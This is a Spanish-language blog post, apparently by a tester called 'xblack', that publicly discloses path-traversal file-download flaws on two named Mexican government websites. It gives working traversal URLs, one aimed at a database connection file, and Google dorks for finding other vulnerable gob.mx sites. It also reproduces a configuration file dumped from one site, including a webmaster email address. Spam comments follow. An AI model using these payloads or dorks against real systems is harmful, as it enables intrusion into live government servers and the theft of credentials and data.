Inicio > Uncategorized > Government Vulnerability. Mexico

Government Vulnerability. Mexico


URL:http://www.congreso-hidalgo.gob.mx
Vulnerabilidad:www.congreso-hidalgo.gob.mx/Bajar.php?id=../
Tester: xblack
Gestor de contenido:phpwcms
DORK:allinurl:gob.mx “bajar.php”
Codigo de Vulnerabilidad:

Pagina de inicio:index.php
PATH CONFIG:/config/phpwcms/conf.inc.php
Contenido conf.inc.php:
0, 'global_recipient_email' => 'form@localhost'); //for better security handling
$phpwcms['allow_cntPHP_rt'] = 0; //allow PHP replacement tags and includes in content parts
$phpwcms['GETparameterName'] = 'id'; //must have a minimum of 2 chars
$phpwcms['BOTS'] = array('googlebot', 'msnbot', 'ia_archiver', 'altavista', 'slurp', 'yahoo', 'jeeves', 'teoma', 'lycos', 'crawler'); //don't start session
$phpwcms['mode_XHTML'] = 1; // Doctype: 1 = XHTML 1.0 Transitional, 0 = HTML 4.01 Transitional
$phpwcms['header_XML'] = 0; // Content Type: 1 = application/xhtml+xml, 0 = text/html
$phpwcms['IE_htc_hover'] = 0; // enables HTC Hover for IE < 7 - has no effect in other browsers
$phpwcms['IE_htc_png'] = 0; // enables HTC pngbehavior for IE 'phpwcms_basic,phpwcms_default,Default,Basic', 'SPAW2' => 'standard,all,mini' );
$phpwcms['GET_pageinfo'] = 0; // will add "&pageinfo=/cat1/cat2/page-title.htm" based on the breadcrumb information for each site link
$phpwcms['version_check'] = 1; // checks for current release of phpwcms online
$phpwcms['SESSION_FEinit'] = 0; // set 1 to enable sessions in frontend, 0 to disable sessions in frontend
$phpwcms['Login_IPcheck'] = 0;
$phpwcms['frontend_edit'] = 0; // enable content specific direct links - linking direct into the backend
$phpwcms['gd_memcheck_off'] = 0; // disable GD php memory check before resize an image

// dynamic ssl encryption engine
$phpwcms['site_ssl_mode'] = '0'; // tuns the SSL Support of WCMS on(1) or off (0) DEFAULT '0'
$phpwcms['site_ssl_url'] = ''; //URL assigned to the SSL Certificate. DON'T add a slash at the End! Exp. 'https://www.yourdomainhere.tld'
$phpwcms['site_ssl_port'] = '443'; //The Port on which you SSL Service serve the secure Sites. Servers DEFAULT is '443'

// smtp values
$phpwcms['SMTP_FROM_EMAIL'] = 'keivinwedell@gmail.com'; // reply/from email address
$phpwcms['SMTP_FROM_NAME'] = 'Webmaster del Congreso del Estado de Hidalgo'; // reply/from name
$phpwcms['SMTP_HOST'] = 'localhost'; // SMTP server (host/IP)
$phpwcms['SMTP_PORT'] = 25; // SMTP-Server port (default 25)
$phpwcms['SMTP_MAILER'] = 'mail'; // default phpMailer: smtp, mail (default), sendmail
$phpwcms['SMTP_AUTH'] = 0; // sets SMTP_AUTH to ON/OFF
$phpwcms['SMTP_USER'] = ''; // default SMTP login (user) name
$phpwcms['SMTP_PASS'] = ''; // default SMTP password

define('PHPWCMS_INCLUDE_CHECK', true);

?>

htaccess:
# These settings are recommend
# Maybe you might have problems
# with other scripts that needs
# register_globals ON

# php_flag magic_quotes_gpc Off
# php_flag register_globals Off

#

# Rewrite functionality for phpwcms
# optimized by Jan212
# 18-04-2004

# Check that you have set Options FollowSymLinks
# and right Allow
# RewriteEngine On

#RewriteCond %{REQUEST_FILENAME} !-f
#RewriteCond %{REQUEST_FILENAME} !-d

# maybe you need this
DirectoryIndex index.html index.php

# Default ReWrite settings for phpwcms
# ===============================================
# This will rewrite 0.0.0.0.0.0.phtml => index.php?id=0.0.0.0.0.0
# RewriteRule ^([0-9]+)\.([0-9]+)\.([0-9]+)\.([0-9]+)\.([0-9]+)\.([0-9]+)\.phtml$ index.php?id=$1,$2,$3,$4,$5,$6

# This will rewrite mypage.phtml => index.php?mypage
# RewriteRule ^(.+)\.phtml$ index.php?$1

# If phpwcms is installed in a subdirectory,
# sample: "mysubdir" then use this (remove #)
# if above lines doesn't work for you
# ===============================================
#RewriteBase /mysubdir
#RewriteRule ^([0-9]+)\.([0-9]+)\.([0-9]+)\.([0-9]+)\.([0-9]+)\.([0-9]+)\.phtml$ /mysubdir/index.php?id=$1,$2,$3,$4,$5,$6
#RewriteRule ^(.+)\.phtml$ /mysubdir/index.php?$1

# If you want to set rewrite logging
# ===============================================
#RewriteLog "/absolute/path/to/the/rewrite.log"
# 0 = Logging disabled, 9 = highest level of logging, only for debugging
#RewriteLogLevel 3

#

#Sometimes neccessary to add those
#
#AddType application/x-javascript .js
#AddType text/css .css

administracion.saf.tabasco.gob.mx/scripts/descarga.php?ruta=../../admin/administracion/periodico/../../Connections/db_source.php

URL:http://administracion.saf.tabasco.gob.mx
Vulnerabilidad:administracion.saf.tabasco.gob.mx/scripts/descarga.php?ruta=../../
Tester: xblack
Gestor de contenido:******
DORK:allinurl:gob.mx "descarga.php"

Categorías:Uncategorized
  1. marzo 20, 2013 a las 10:47 pm

    Hello There. I discovered your weblog using msn. This is an
    extremely well written article. I’ll be sure to bookmark it and return to learn extra of your helpful information. Thank you for the post. I’ll certainly comeback.

  2. abril 1, 2013 a las 4:18 pm

    Howdy this is kinda of off topic but I was wondering if blogs use WYSIWYG editors
    or if you have to manually code with HTML.
    I’m starting a blog soon but have no coding experience so I wanted to get guidance from someone with experience. Any help would be enormously appreciated!

  3. julio 31, 2013 a las 11:16 pm

    hi there! , Nice composing thus much! discuss we all converse much more about your site with America online? My spouse and i call for a specialist on this area to take care of the trouble. Possibly that is you! Taking a look toward view you.

  1. febrero 29, 2016 a las 5:52 pm
  2. marzo 21, 2016 a las 4:38 pm
  3. marzo 25, 2016 a las 4:06 pm

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s

A %d blogueros les gusta esto: